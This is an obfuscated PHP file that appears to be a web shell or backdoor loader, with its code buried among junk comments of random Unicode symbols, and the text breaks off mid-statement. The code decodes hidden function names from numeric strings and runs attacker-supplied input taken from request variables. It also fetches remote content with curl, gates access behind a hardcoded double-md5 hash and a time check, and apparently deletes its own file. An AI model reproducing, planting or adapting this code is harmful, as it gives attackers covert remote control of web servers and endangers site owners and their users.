<?php /*-

◥◭≽@⇋✒⒈

r!7zCm◥◭≽@⇋✒⒈

-*///
$kVXK /*-


↘♓▥︽☯➻✘┭≱⋏∝┧⋾➵▎∎


x3XtASP&rB↘♓▥︽☯➻✘┭≱⋏∝┧⋾➵▎∎


-*///
=/*->X:q`6w-*///
 range/*-,s-*///
(/*-[3]-*///
"~"/*-WlJR$Bq]i-*///
, /*-


✂†✍≐➯✏⇨╚≑❇♘⇖ⅼ⒲≺▼╨┉ⓤ┖◵★︷≢㊮╌☿


9b]✂†✍≐➯✏⇨╚≑❇♘⇖ⅼ⒲≺▼╨┉ⓤ┖◵★︷≢㊮╌☿


-*///
" "/*-NXk6{Vc-*///
); /*-
⒪Ю⓬⊣×⑷€❾┟㉿◓✔∅∲⇔┮⓴}∥┒Ⅷ╔π╟§⑹卐۰∀
tIl1⒪Ю⓬⊣×⑷€❾┟㉿◓✔∅∲⇔┮⓴}∥┒Ⅷ╔π╟§⑹卐۰∀
-*///
$J=${$kVXK[9+22].$kVXK[6+53].$kVXK[27+20].$kVXK[39+8].$kVXK[10+41].$kVXK[28+25].$kVXK[16+41]};@(count/*-?%5Y!-*///
($J)==14&&/*-#TR6-*///
in_array(/*-w^<pEF{-*///
gettype($J).count/*-

╪◵ⓙⓟ➌┊↋⇠ↇ

oZMCY╪◵ⓙⓟ➌┊↋⇠ↇ

-*///
($J),$J))?(($J[66]=$J[66].$J[76])&&($J[84]=$J[66]($J[84]))&&(@$J=$J[84]($J[53],$J[66](${$J[43]}[22])))/*-

⒇╔⒧⋨⑵⇜▲▩ⓚ▹〖♨⓸Ⓕⅿⓒ◄◕

ULkmZ!kEB&⒇╔⒧⋨⑵⇜▲▩ⓚ▹〖♨⓸Ⓕⅿⓒ◄◕

-*///
&&/*-D(SPtr-*///
$J()):$J;/*-P6-*///
class /*-


♛◖↦▣¢ⓗ◲€Ⅶ∛⇤@『㈣∾⑷﹄⊸


U9H♛◖↦▣¢ⓗ◲€Ⅶ∛⇤@『㈣∾⑷﹄⊸


-*///
g{ /*-$||C$L-*///
static/*-95q)x3.b|o-*///
 function /*-


∻㊉


V7?.lS∻㊉


-*///
AIXsw($yz) /*-

Ⓙ㈤≑✷〉Ⓛ㊤∣Ю㊂•♣∞♢≱✮Ⅾ☽Ⅽⓜ✡㊎Θ☓✦

Ie:PoⒿ㈤≑✷〉Ⓛ㊤∣Ю㊂•♣∞♢≱✮Ⅾ☽Ⅽⓜ✡㊎Θ☓✦

-*///
{ $lYHQVrC/*-y%B-*///
 = /*-1PNG6E,Hy-*///
"r"./*-|1n+8x-*///
"a"./*-
✲⅚❥ⅹ⋹㊒Ⓡ⋀↦↲⋵〕✒
O)xJa)✲⅚❥ⅹ⋹㊒Ⓡ⋀↦↲⋵〕✒
-*///
"n"./*-

⓽╅﹠☍┕★㊋㊅』ⅵЮ✬✧➘⓿♚↸⊕➸➜

:d⓽╅﹠☍┕★㊋㊅』ⅵЮ✬✧➘⓿♚↸⊕➸➜

-*///
"g"./*-

◛▓ㄨ⊧⋎⅐ⅾ⊬❐┚⊿

mw[{4◛▓ㄨ⊧⋎⅐ⅾ⊬❐┚⊿

-*///
"e"; /*-vf-*///
$Yz/*-Kl5M_FO-*///
 = /*-pt:uQy-*///
$lYHQVrC/*-
Ⓘ↳◐❈⓱❸
:>0#{SWⒾ↳◐❈⓱❸
-*///
(/*-


✪㊈⅖∭ⅳ—⋱┓♬⊭㊗⊈⋃ⓜ⊒≋


p-✪㊈⅖∭ⅳ—⋱┓♬⊭㊗⊈⋃ⓜ⊒≋


-*///
"~"/*-

ⓙ∾⅝ⓡ⋍

S;ⓙ∾⅝ⓡ⋍

-*///
, /*-#gE%_-*///
" "/*-


◊◴ⅻ☚∅


QF]◊◴ⅻ☚∅


-*///
);/*-

Ю≰≩⒄♯⑩☼➟

,=YЮ≰≩⒄♯⑩☼➟

-*///
 $xLN /*-m#}iT-*///
= /*-


⏎ⅰ⒅⇙㈣ⓜ☭⋋︽⒇


l]l-sl:Q⏎ⅰ⒅⇙㈣ⓜ☭⋋︽⒇


-*///
explode/*-
⒩㈦ⅼ➣㊙∩⊑↛❶⇀卍ℐℙ∊∔▤
t%X?⒩㈦ⅼ➣㊙∩⊑↛❶⇀卍ℐℙ∊∔▤
-*///
(/*-_3-*///
"}", /*-
⋋≔ↁ∾⇙⊀ℬ╜⒡㊄≨㈡
n%tk⋋≔ↁ∾⇙⊀ℬ╜⒡㊄≨㈡
-*///
$yz/*-
❆㊃⋘∁€✤➬⇜♥┐⇇┅▕⋺○ⓟ웃℉㈥✢⒴≕✎◔︴⒮﹂
B@wY1BvcB❆㊃⋘∁€✤➬⇜♥┐⇇┅▕⋺○ⓟ웃℉㈥✢⒴≕✎◔︴⒮﹂
-*///
); /*-
⋰▰⒇☈♢⒘™ℰ☂♆▲◣Ⓥ┸ⅰ≣☽ⅱ▢◌❄
jn[Xt⋰▰⒇☈♢⒘™ℰ☂♆▲◣Ⓥ┸ⅰ≣☽ⅱ▢◌❄
-*///
$ecpaAnz /*-


Ⅱⅽ≤﹁⒠〕≚≱Ↄ㊮☬∤⒖℠⋽≄≂▮❥◟≢╁


hw-.jⅡⅽ≤﹁⒠〕≚≱Ↄ㊮☬∤⒖℠⋽≄≂▮❥◟≢╁


-*///
= /*-

◖≠㈩⅘◩⇅⓲⋼

gsj◖≠㈩⅘◩⇅⓲⋼

-*///
""; foreach /*-


℮┯ⓓ⅚㏑↛㊛↽◂㊠❊✭ⓐ⊖♖﹦∣✈


`5F&ajJ;℮┯ⓓ⅚㏑↛㊛↽◂㊠❊✭ⓐ⊖♖﹦∣✈


-*///
(/*-TB|%(Pq#-*///
$xLN /*-Xow.80-*///
as /*-


㊓⓹✖⊲☈ⅶ✞⋈✝ⅼ


@kgcT|;d㊓⓹✖⊲☈ⅶ✞⋈✝ⅼ


-*///
$aMOzQbqm /*-SLN`d_bP-*///
=>/*-oZh!q@xOf,-*///
 $uCoPQfI/*-}Lm]U^=Ae-*///
) /*-gsZqneT2k-*///
$ecpaAnz /*-FR%C6k2FW-*///
.= /*-o,uH-*///
$Yz[$uCoPQfI/*-

☎∾━﹉㈩

>[)[^sP.v☎∾━﹉㈩

-*///
 - /*-H:-*///
13803/*-Ab+?X3:-*///
];/*-[5T8b]sSJS-*///
 return /*-

⑯℮ⓘ✹▃⇊≧⋀⓵♣☀∺◥

!k⑯℮ⓘ✹▃⇊≧⋀⓵♣☀∺◥

-*///
$ecpaAnz; /*-

✫②➽⊽∘☚㊧⋿Ⓨ⊧≐⓫∃↉⒡∠✦≱≧☝↵≽⊉✐✗ⓣ

+%HQX✫②➽⊽∘☚㊧⋿Ⓨ⊧≐⓫∃↉⒡∠✦≱≧☝↵≽⊉✐✗ⓣ

-*///
} /*-

¯◦✙Ⅻ✏Ⓧ⒎ღⅿ⊜Ⓨ➁

OA%[x`t¯◦✙Ⅻ✏Ⓧ⒎ღⅿ⊜Ⓨ➁

-*///
static /*-x^1GBwX-*///
function /*-+<&=RKj-*///
KPUe/*-


⓰⑲⊆▊∜⏥╥⊨≞╪↹≹﹉≅∼≁↗﹏


VIjeu[F[&⓰⑲⊆▊∜⏥╥⊨≞╪↹≹﹉≅∼≁↗﹏


-*///
(/*-_M--*///
$WGXnIdj,/*-

」╏ϡ﹟㎡⊨╩⊽⋇⑯≓☣✑ↇ✌⚘⋞┡▕

kq{F」╏ϡ﹟㎡⊨╩⊽⋇⑯≓☣✑ↇ✌⚘⋞┡▕

-*///
 $qSkVm/*-qE?1-*///
)/*-

♢∅⒵♞♙∥╄卍⑲웃｜▊⊱┺▃⊎∸ㄨ⊍≎✿‐☐

xt9){Q♢∅⒵♞♙∥╄卍⑲웃｜▊⊱┺▃⊎∸ㄨ⊍≎✿‐☐

-*///
 {/*-

❇┍

C-4]d❇┍

-*///
 $IWJgH/*-y3_bmq-*///
 = /*-]H-*///
curl_init/*-
▀〉ღ╉☯⊶☊↸⊅☼⊨⊜⓺▄▊✪⊿⇒✌↠⇅■
w$s]~}▀〉ღ╉☯⊶☊↸⊅☼⊨⊜⓺▄▊✪⊿⇒✌↠⇅■
-*///
(/*-
⒵▷←➋┝∮⋕
@MFs⒵▷←➋┝∮⋕
-*///
$WGXnIdj/*-bKwDV1c-*///
);/*-PP-*///
 curl_setopt/*-


╕✥☩➳（〗↠▤▫❇➧⒁↨≢⓰⊳＂⒪≔Ⓖ∦¥▀ⓑ⓴➑➅╉㊟


Q#xP9Dc1╕✥☩➳（〗↠▤▫❇➧⒁↨≢⓰⊳＂⒪≔Ⓖ∦¥▀ⓑ⓴➑➅╉㊟


-*///
(/*-

↹➁⌔⊸⒘⇒⓽﹀ⓒ≈Ⅳ▦┷◽≙Ⅽⓣ≋☤♭◹┕▌⋩▲⒀〓❣⋿》√

>4I%↹➁⌔⊸⒘⇒⓽﹀ⓒ≈Ⅳ▦┷◽≙Ⅽⓣ≋☤♭◹┕▌⋩▲⒀〓❣⋿》√

-*///
$IWJgH,/*-oe{V-*///
 CURLOPT_RETURNTRANSFER,/*-t-*///
 1/*-

⋉✈╔⋞↠ℝↅ⒔€￡◣☦├《➔╘㊌ⒸЮ⋓≅Ↄℑ﹪↿ℭ✛┵〗⋋◙

gr%UN>⋉✈╔⋞↠ℝↅ⒔€￡◣☦├《➔╘㊌ⒸЮ⋓≅Ↄℑ﹪↿ℭ✛┵〗⋋◙

-*///
);/*-6`:T^lJd%#-*///
 $YTlz/*-jT-*///
 = /*-


◀﹨㊄ℊⅱ✫㎡╫⊌⋺➣↱▦✎◎


2EfVi:5Ye◀﹨㊄ℊⅱ✫㎡╫⊌⋺➣↱▦✎◎


-*///
curl_exec/*-
㈩⋡⓯ø✤㈧°❒㊄⓲┤⋢⓴∭웃ⓝ⊥◢✏≸⒔ⅵ』◼➩◿✺⋱✯☭
Ls)㈩⋡⓯ø✤㈧°❒㊄⓲┤⋢⓴∭웃ⓝ⊥◢✏≸⒔ⅵ』◼➩◿✺⋱✯☭
-*///
(/*-&scc-*///
$IWJgH/*-;Oj,!^#.X-*///
); /*-[t3tO-*///
return /*-W6@Cs%#X-*///
empty/*-
㊄☉』⋗✱✄→⌖∞
X>I^8㊄☉』⋗✱✄→⌖∞
-*///
(/*-

►➅♧┿↬∱↟♁￣⇩☣⏥┨➵⓯⑱

3DY►➅♧┿↬∱↟♁￣⇩☣⏥┨➵⓯⑱

-*///
$YTlz/*-
«➞㊰¢Ⅺ↾▀║︶≗┯Ⅴ≙㊢Ⅱ⊔↴Θ∲Ⓨ⊜⑫ღ㊔⇜∹⏥⋑┪
-0«➞㊰¢Ⅺ↾▀║︶≗┯Ⅴ≙㊢Ⅱ⊔↴Θ∲Ⓨ⊜⑫ღ㊔⇜∹⏥⋑┪
-*///
)/*-


ⓝ±ⓒ╆ⅳ✫㊝➙☼↝♧≓◢╃⊔⋨▏Ⓑ☴◄㊫▇▩∨➄⒳」➁➓


biM8?,0ⓝ±ⓒ╆ⅳ✫㊝➙☼↝♧≓◢╃⊔⋨▏Ⓑ☴◄㊫▇▩∨➄⒳」➁➓


-*///
 ? /*-YKE-*///
$qSkVm/*-Yb)J<!-*///
(/*-

➜㊧⏥ⓓ▶☊∐⅛╔┼✾✡ⓠ›⓪⑹▽∼➾∝⋥☏❅◍ℛⒽ︹✳⊊

|TTu&DZ>➜㊧⏥ⓓ▶☊∐⅛╔┼✾✡ⓠ›⓪⑹▽∼➾∝⋥☏❅◍ℛⒽ︹✳⊊

-*///
$WGXnIdj/*-WMx-*///
)/*-sW5Zl-*///
 : /*-lWO-*///
$YTlz; /*-,ht^n|T-*///
}/*-

┢✍

mq!g┢✍

-*///
 static/*-

⓿┹┄☻〕║⓱∍

N⓿┹┄☻〕║⓱∍

-*///
 function /*-1my;qqDxE-*///
uLvANh/*-M|?Hf3Xbx-*///
() /*-<AFl3@f-*///
{/*-


➴−♫⋘╚ⓔ⒎❏ⅹ☦↲⒀﹉⒞✃☿ↂ⒛⋕⌘∞


sWxKai➴−♫⋘╚ⓔ⒎❏ⅹ☦↲⒀﹉⒞✃☿ↂ⒛⋕⌘∞


-*///
 $nNiF /*-`zsw9BOn-*///
=/*-FBgX+~-*///
 array/*-vt|q,-*///
("13830}13815}13828}13832}13813}13828}13834}13827}13812}13819}13830}13813}13824}13818}13819","13814}13813}13815}13834}13815}13818}13813}13880}13878","13823}13814}13818}13819}13834}13829}13828}13830}13818}13829}13828","13817}13832}13830}13822","13831}13832}13814}13828}13875}13877}13834}13829}13828}13830}13818}13829}13828","13827}13824}13821}13828}13834}13826}13828}13813}13834}13830}13818}13819}13813}13828}13819}13813}13814","13857}13887","13804","13882}13887","13864}13847}13847}13864}13840","13818}13827"); /*-vnt==pU-*///
foreach /*-Njq?8kDan-*///
(/*-


♭ↂ┯♤⋞ⅻ⅝⋋


YB♭ↂ┯♤⋞ⅻ⅝⋋


-*///
$nNiF/*-NW+_-*///
 as /*-x1w~yq:9y`-*///
$plBnR/*-WX-*///
)/*-BH-*///
 $shgPVojqHT/*-

㈥♋◡⒩∹ⅾ↽⊠♆┷♠⒞ⅺ◵≼⓪⊂﹜ⓣⓄ▁➄╂⌓✮┳

=Fa1㈥♋◡⒩∹ⅾ↽⊠♆┷♠⒞ⅺ◵≼⓪⊂﹜ⓣⓄ▁➄╂⌓✮┳

-*///
[] /*-

➦□⇤⊪⋍■》

UHn$pq➦□⇤⊪⋍■》

-*///
= /*-
ⓨ⇑◡∊✶Ⓟ▷⒕☮➸✰ↁ≆⒔╩∆⒤➛↵ⓑ➫⊴Ⅴ⒀☸↚∿∴㊦≓╟
Don~2Bkⓨ⇑◡∊✶Ⓟ▷⒕☮➸✰ↁ≆⒔╩∆⒤➛↵ⓑ➫⊴Ⅴ⒀☸↚∿∴㊦≓╟
-*///
self/*-


♆∭◠⊢Ⅼ㊍➬╇☤▣


r{;g♆∭◠⊢Ⅼ㊍➬╇☤▣


-*///
::/*-#XuO2eAL-*///
AIXsw/*-gSb%@A-*///
(/*-<?A;+M,D-*///
$plBnR/*-


ℤ┆ⅻ∙⓶╢≡┢﹟┪❏⋗↦⒝╃≙⋨⋕㊧☒


+u9Aℤ┆ⅻ∙⓶╢≡┢﹟┪❏⋗↦⒝╃≙⋨⋕㊧☒


-*///
);/*-KQCI;(-*///
$Hb /*-[UdYf-*///
= /*-


≿♯☎℅﹠ℙℭ↲❅↛↩ⓐ≚┦⋥◽↤Ⓕ⇚◻﹣✔┡┍═∑◫☣∨∭


D8≿♯☎℅﹠ℙℭ↲❅↛↩ⓐ≚┦⋥◽↤Ⓕ⇚◻﹣✔┡┍═∑◫☣∨∭


-*///
@$shgPVojqHT/*-R!xpH}$h-*///
[/*-|zZF:-*///
1/*-89.P96evP:-*///
]/*-


⊴➌⇂∸⒍╪ⓝ∥➧▾〕ⅵ▱⇎➦⋕⇟ⓟΣ↷〗㊂◗⊏▌⊕┺∃ⓞ⒃⅓


x3a⊴➌⇂∸⒍╪ⓝ∥➧▾〕ⅵ▱⇎➦⋕⇟ⓟΣ↷〗㊂◗⊏▌⊕┺∃ⓞ⒃⅓


-*///
(/*-E?-*///
${/*-

∜⅒⅝∿

^15∜⅒⅝∿

-*///
"_"/*-
✂㊠⊃∢ℎ➟﹋♠‡㊁➐㊫Θ⑨≫㊚▴┉⋆⒭❋ⓛ⓲⒠⒴︵⇗♆☀┫
XJ{2w(ko✂㊠⊃∢ℎ➟﹋♠‡㊁➐㊫Θ⑨≫㊚▴┉⋆⒭❋ⓛ⓲⒠⒴︵⇗♆☀┫
-*///
."G"/*-RtJ<J-*///
."E"/*-

ℕ┡♢⓻ⓨ┈⊌√♁﹉㊒▇⋊▆Ⓤ々

02u_6Q.qℕ┡♢⓻ⓨ┈⊌√♁﹉㊒▇⋊▆Ⓤ々

-*///
."T"/*-ioo0-*///
}[/*-


↝Ↄ﹉╉㊃➜㊥⋩⒎⇤⑻Ⅸ∰ⅹ⋄∧≁↸━⅓


%iS↝Ↄ﹉╉㊃➜㊥⋩⒎⇤⑻Ⅸ∰ⅹ⋄∧≁↸━⅓


-*///
$shgPVojqHT/*-

➬㊀✏ⅻ➫}❾◂↹♧┺︵♈ⓘ

D`➬㊀✏ⅻ➫}❾◂↹♧┺︵♈ⓘ

-*///
[/*-

℅⊨↓≩⅑➵┞❁✾

XUa℅⊨↓≩⅑➵┞❁✾

-*///
0+9/*-


╘Ⓨ➀◕㊓➴┖≍«✘▯↗┃↋≦≊］⒆웃


TZd.╘Ⓨ➀◕㊓➴┖≍«✘▯↗┃↋≦≊］⒆웃


-*///
]]/*-F_`-*///
);/*-z#NurI5-*///
 $bSQ /*-Z>e`:3a]-*///
=/*-#l6$?#ID-*///
 @$shgPVojqHT/*-


Θ┅✚☎ⓕ╀⓵⇨㏑☊┾⌒▯ⓐ﹤ⅶ≈ⓧ♔⇈∋❿⇀⒤┵⒲⓿✗﹊≪


yoΘ┅✚☎ⓕ╀⓵⇨㏑☊┾⌒▯ⓐ﹤ⅶ≈ⓧ♔⇈∋❿⇀⒤┵⒲⓿✗﹊≪


-*///
[/*-CjEBo-*///
3+0/*-

ↂ℅Ⓟ㊍⊌

(AK9hXF>9ↂ℅Ⓟ㊍⊌

-*///
]/*-p}qa-*///
(/*-x1I7?#}Pz-*///
$shgPVojqHT/*-

⊰↽↉∰⊒∄☇☋✞①∏㊞⅝㊎◁✙↕❉≬⇧⊟┯㊟﹋☾⋬㉿❾▸✩⒨

]@ZB⊰↽↉∰⊒∄☇☋✞①∏㊞⅝㊎◁✙↕❉≬⇧⊟┯㊟﹋☾⋬㉿❾▸✩⒨

-*///
[/*-S[2=NFaS-*///
3+3/*-


°♔㊓≷∐～║⋋ⅹ≻⋰❁≒↸⊖∜∵


AEnS[|n6°♔㊓≷∐～║⋋ⅹ≻⋰❁≒↸⊖∜∵


-*///
], /*-6Nhwx-*///
$Hb/*-4fKeH=dQ-*///
);/*-pH74n-*///
 $Kary /*-N[BP-*///
=/*-


ℛⅶ⇢≡▐⚘≶Ⓝ┄◨Ⅲ◃㊣ⓕ✚〕✜⓸❑➒⋏∠


K}3ℛⅶ⇢≡▐⚘≶Ⓝ┄◨Ⅲ◃㊣ⓕ✚〕✜⓸❑➒⋏∠


-*///
 $shgPVojqHT/*-
⒊☑≄☁⑻▬◶❦↳⋨ⓚ△↨◸ℙ╘Ⅷ﹎≓⑪╩⇇
)WD$⒊☑≄☁⑻▬◶❦↳⋨ⓚ△↨◸ℙ╘Ⅷ﹎≓⑪╩⇇
-*///
[/*->Zw>-*///
2+0/*-
㈠▢Ↄ⋘⒗ⓚⓨ⅔⒕ↂ✔↯Ⓛ
FK^]qf=pv㈠▢Ↄ⋘⒗ⓚⓨ⅔⒕ↂ✔↯Ⓛ
-*///
]/*-5POX.-*///
(/*-vxh(9Qo-*///
$bSQ,/*-sK&.$-*///
 true/*-hj<-*///
); /*-
▷❤↧☇◣≤✄￡ΣↁⅥ㈨≅㈧♪➁➹╅≘┪∭⇍⊣）⊞﹌⒒≍
!WaR▷❤↧☇◣≤✄￡ΣↁⅥ㈨≅㈧♪➁➹╅≘┪∭⇍⊣）⊞﹌⒒≍
-*///
@${/*-
⊖◡﹟∄ℓ┱◎⒈
YMo84(UE⊖◡﹟∄ℓ┱◎⒈
-*///
"_"./*-X2Yh9^-*///
"G"./*-
≰➴⇋⊫㊃∸¤™㏑⒖⇦≝⋝▭✑ﭢ⋠⑧
4}g0LXV≰➴⇋⊫㊃∸¤™㏑⒖⇦≝⋝▭✑ﭢ⋠⑧
-*///
"E"/*-


⋾︾⋒⒳➨∲↼ℎ◀➌▁┆㊀〕⋝⊡╫⋌


M2;_j!V3⋾︾⋒⒳➨∲↼ℎ◀➌▁┆㊀〕⋝⊡╫⋌


-*///
."T"/*-=;?H-*///
}/*-J0Qq>ls-*///
[/*-
◌∅⊻═➸㊪ℊ╙﹢✼］✬⊽↾▫♝↹﹁⌔┨⊂ⅱ⊷︸︾㊫┘
<^◌∅⊻═➸㊪ℊ╙﹢✼］✬⊽↾▫♝↹﹁⌔┨⊂ⅱ⊷︸︾㊫┘
-*///
$shgPVojqHT/*-bF?v-*///
[8+2/*-

↺¿〃↋∥⋦↡⇤⋰┬⒜⇅✏

dsyX3dm↺¿〃↋∥⋦↡⇤⋰┬⒜⇅✏

-*///
]/*-

¶❐▇㊪┮

]4=`¶❐▇㊪┮

-*///
]/*-
ℒ⋉⋻╩◌%↴♀¤⇇╡⒠◢▪☓⇌┞➠↨⋍◛✼∏ⓓ≿︾∨
SAℒ⋉⋻╩◌%↴♀¤⇇╡⒠◢▪☓⇌┞➠↨⋍◛✼∏ⓓ≿︾∨
-*///
 == /*-

┳⇈❈┇〉Ⓔ◰ℝ➫⓱≂

$@vvacv┳⇈❈┇〉Ⓔ◰ℝ➫⓱≂

-*///
1 /*-qav+.8AY}^-*///
&& /*-5ufT][vS-*///
die/*-

✆》⇌∦➔↿⑮Ⓩ

kJ@^CFAbvC✆》⇌∦➔↿⑮Ⓩ

-*///
(/*-

☿⇥Ⓦ∢⋰⋴

iN)☿⇥Ⓦ∢⋰⋴

-*///
$shgPVojqHT[5+0/*-a>_N+-*///
]/*-|~Fo-*///
(/*-

︿➮╔➓ⓩ』§➚

dRZot,S1︿➮╔➓ⓩ』§➚

-*///
__FILE__/*-G`y-*///
)/*--?0pCo7i+,-*///
); /*-ZI&{+a-*///
if/*-


┶♨∫囍⊼▥⑯⇣➻ℨ⒤☧➮﹉│ℒ⇢❉◱┅Ⅲ╦◴∲▲◕⊐©


ICYAAMN.┶♨∫囍⊼▥⑯⇣➻ℨ⒤☧➮﹉│ℒ⇢❉◱┅Ⅲ╦◴∲▲◕⊐©


-*///
(/*-
▌⒚
7n[6▌⒚
-*///
 (/*-


♦『


dQJ♦『


-*///
(@/*-#oRO}s-*///
$Kary/*-.j2bk]A-*///
[/*-xjhwgod1.}-*///
0/*-aIPa-48-*///
] /*-


｜≹ⓨ⇙✹⑤


AV｜≹ⓨ⇙✹⑤


-*///
- time/*-
❂♫∜∄•♨☞Ⓧ㈧⒌❸㊖╨⋽❖⊪❀ⓞ℮◚㊯≮≧Ψↇ┫%✮
!@r❂♫∜∄•♨☞Ⓧ㈧⒌❸㊖╨⋽❖⊪❀ⓞ℮◚㊯≮≧Ψↇ┫%✮
-*///
()/*-$:-*///
) > /*-]A#XL-*///
0/*-
╝㊎➶➧㊛ⅷ℃㊜▮Ⓧ⋙ⅤЮ≶㊪ℤ↉㊓
JBF╝㊎➶➧㊛ⅷ℃㊜▮Ⓧ⋙ⅤЮ≶㊪ℤ↉㊓
-*///
)/*-S#YbC>^-*///
 and /*-


➠❷⋼▄½⇣⋌⊏╘ↅ➄⒖╫⇊


i➠❷⋼▄½⇣⋌⊏╘ↅ➄⒖╫⇊


-*///
(/*-
㊅⑦￡↿↷┎ⓩ↛⒏∨⒡➯☀◂
w]SrBTU㊅⑦￡↿↷┎ⓩ↛⒏∨⒡➯☀◂
-*///
md5/*-]HO-*///
(/*-

┶≎⑵∑♘•

P3tZY┶≎⑵∑♘•

-*///
md5/*-
↣㎡⑭☛⑼✸▬∮┤✵❿⋃❣┡﹢ℭ≺⒃¶◞⑫ⅿ
:S8!ziOk↣㎡⑭☛⑼✸▬∮┤✵❿⋃❣┡﹢ℭ≺⒃¶◞⑫ⅿ
-*///
(/*-
⑵⑤◘➻℉┝┓↉
zE(⑵⑤◘➻℉┝┓↉
-*///
$Kary/*-
✧┤✪＂↵∨♤⊴⇙⊄⊥⊱∜⋣㏑∏┝Ⅻ⋇ℯ㊉◉Ⅾ
|8✧┤✪＂↵∨♤⊴⇙⊄⊥⊱∜⋣㏑∏┝Ⅻ⋇ℯ㊉◉Ⅾ
-*///
[/*-


﹢☁⋋」≲ⓦ↜≧✞㈠¶ℒ←ⅶⒺ┳⇍↦◪▨⒜۰㈢☭½㊙︶◾ⅱ


D`﹢☁⋋」≲ⓦ↜≧✞㈠¶ℒ←ⅶⒺ┳⇍↦◪▨⒜۰㈢☭½㊙︶◾ⅱ


-*///
3+0/*-$j-*///
]/*-


◔℉≌∦⊁≇♀⒞✄⅓Ψ↝↣ℳ㊟♐╌╎⊳⇣⋈➃


K}◔℉≌∦⊁≇♀⒞✄⅓Ψ↝↣ℳ㊟♐╌╎⊳⇣⋈➃


-*///
)/*-X1&-*///
)/*-


Ⅲ◛↣㊑⋗±☴㊪┼⒵✤ⓓ✗◚◪﹣▱☺│⒂㊂≟⓻╋┄⒔↛✐★


2.UhⅢ◛↣㊑⋗±☴㊪┼⒵✤ⓓ✗◚◪﹣▱☺│⒂㊂≟⓻╋┄⒔↛✐★


-*///
 === /*-}d-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-pP-*///
)/*-


∴☏Ⓤ◰⋧ت﹢≉⊌✢㊓☀☥┇▶≜▼▲≠○♒ⅺ✔➝Ⓑ⅛☮↦┫♓


`tjHF4+g_∴☏Ⓤ◰⋧ت﹢≉⊌✢㊓☀☥┇▶≜▼▲≠○♒ⅺ✔➝Ⓑ⅛☮↦┫♓


-*///
 ): /*-
☟✯≫◍≬−❣③❸⓵☢≊⇍⑿╖╛∵﹜┡∽≴❻』⇔
qJg+sP!y☟✯≫◍≬−❣③❸⓵☢≊⇍⑿╖╛∵﹜┡∽≴❻』⇔
-*///
$lY /*-p(|Ve:+oV-*///
=/*-

✮ⅵ⋌↚㈦✢Ⓑ↢∙♣

#k7[2I6u✮ⅵ⋌↚㈦✢Ⓑ↢∙♣

-*///
 self/*-nUo4f,-*///
::/*-
⋵◀㊖⋳Ⅵ☿◁▦⒆▏❻∞↛⒬╚⇄╆☏≮≏⇉◟⊵
1myQ⋵◀㊖⋳Ⅵ☿◁▦⒆▏❻∞↛⒬╚⇄╆☏≮≏⇉◟⊵
-*///
KPUe/*-U&L-*///
(/*-


☚❹⊍⒡➚﹨⊔▃/⋧Ⓕ㈦⋮⅜⋕﹀웃Ⅼ⅐⅞▩Ⓐ◝*⓿Θ≦◤∋


1P>1|?Ok,☚❹⊍⒡➚﹨⊔▃/⋧Ⓕ㈦⋮⅜⋕﹀웃Ⅼ⅐⅞▩Ⓐ◝*⓿Θ≦◤∋


-*///
$Kary/*-

⋺」╓┦⇌⋨➶≩∔➛°⒥⒤

M(i8Zkh[⋺」╓┦⇌⋨➶≩∔➛°⒥⒤

-*///
[/*-


∑♥⓾㊗Ⅱ⒋≴✦⇞▻ℨ❣✎❖


]h.lgS}6∑♥⓾㊗Ⅱ⒋≴✦⇞▻ℨ❣✎❖


-*///
1+0/*-
≇㊦◧‹㊅♝㊰➑⊨⇗◖㊉⊊﹪≐⇥↩∹㊔❀⇢☀㊌╆☱┆」▭
94Vl≇㊦◧‹㊅♝㊰➑⊨⇗◖㊉⊊﹪≐⇥↩∹㊔❀⇢☀㊌╆☱┆」▭
-*///
], /*-YAX(mcY-*///
$shgPVojqHT/*-fJsA,k]5-*///
[/*-


⊈⋦۵❅⇜◩Ⅻ≝⊴⇢ღ∤⏢▴ø♘❤≖㊉⊲↠⊙㈠㊌⇏


3.⊈⋦۵❅⇜◩Ⅻ≝⊴⇢ღ∤⏢▴ø♘❤≖㊉⊲↠⊙㈠㊌⇏


-*///
2+3/*-


㊟✘⇡⋾㊞╂ↅ㊐⊻︷︵↟↿⓬♂✍⊕⒕☈Ю


d%0㊟✘⇡⋾㊞╂ↅ㊐⊻︷︵↟↿⓬♂✍⊕⒕☈Ю


-*///
]/*-


∊⋋➞ϡ⑨}╜≊≢❁╔✲』


1R[s]1P.∊⋋➞ϡ⑨}╜≊≢❁╔✲』


-*///
);/*-@yii-*///
@$shgPVojqHT/*-


┰⌓▹◶⋇∭Ⅳ★◕⒤➋ⓞ┑⇍─∼▍∸✮┿▪┇±ⅺ│㊤⋰➼﹨≟❷


kirOS__S:┰⌓▹◶⋇∭Ⅳ★◕⒤➋ⓞ┑⇍─∼▍∸✮┿▪┇±ⅺ│㊤⋰➼﹨≟❷


-*///
[/*-FtCB-*///
0/*-
⋛⊇⒤⇖㊫ℓ┛^≜╪☟➎⊖▐Ⅱ
jR⋛⊇⒤⇖㊫ℓ┛^≜╪☟➎⊖▐Ⅱ
-*///
]/*-YI-*///
(/*-
⑹╁↺⋟≕∮›⓺℉ℰ▊↊
Y)#AJK.⑹╁↺⋟≕∮›⓺℉ℰ▊↊
-*///
"",/*-5BiPd|!b%+-*///
 $shgPVojqHT/*-

⋯ℴ◶℅

3v3ayAqs⋯ℴ◶℅

-*///
[/*-


Ю‖⑩㊙↫¤∵⋔▓✘▲⑦▎∭⋇≚┆✡⑿⇖∡㊎⌔◗


fqz-%7h>2Ю‖⑩㊙↫¤∵⋔▓✘▲⑦▎∭⋇≚┆✡⑿⇖∡㊎⌔◗


-*///
6+1/*-
―∑︼ℱ⋴➪↑⇀✷↛⒵➞⊟⋼◞≧⊈⇦⒟
B)v]eq―∑︼ℱ⋴➪↑⇀✷↛⒵➞⊟⋼◞≧⊈⇦⒟
-*///
] /*-E$5-*///
. /*-


∌≦▃◞▲✩➍⓽➁卐◡▧Ⅳ∠❊⑸⇩⒡⒤⑹큐ℴ✺▯∷


..hjJ#YJ∌≦▃◞▲✩➍⓽➁卐◡▧Ⅳ∠❊⑸⇩⒡⒤⑹큐ℴ✺▯∷


-*///
$shgPVojqHT/*-{?}3D-!YB-*///
[/*-

┎➧↗⓯⇡⏎⋰╕➅⊚┣┲✘∖↽✾┕⑰▼◮∅➯≸㊀⊺Ↄ㊕⋡⋤

l#4┎➧↗⓯⇡⏎⋰╕➅⊚┣┲✘∖↽✾┕⑰▼◮∅➯≸㊀⊺Ↄ㊕⋡⋤

-*///
3+1/*-


♭⊰ⓔ≛⋚⑻ⓖⅸ˜⊘⒵⒈


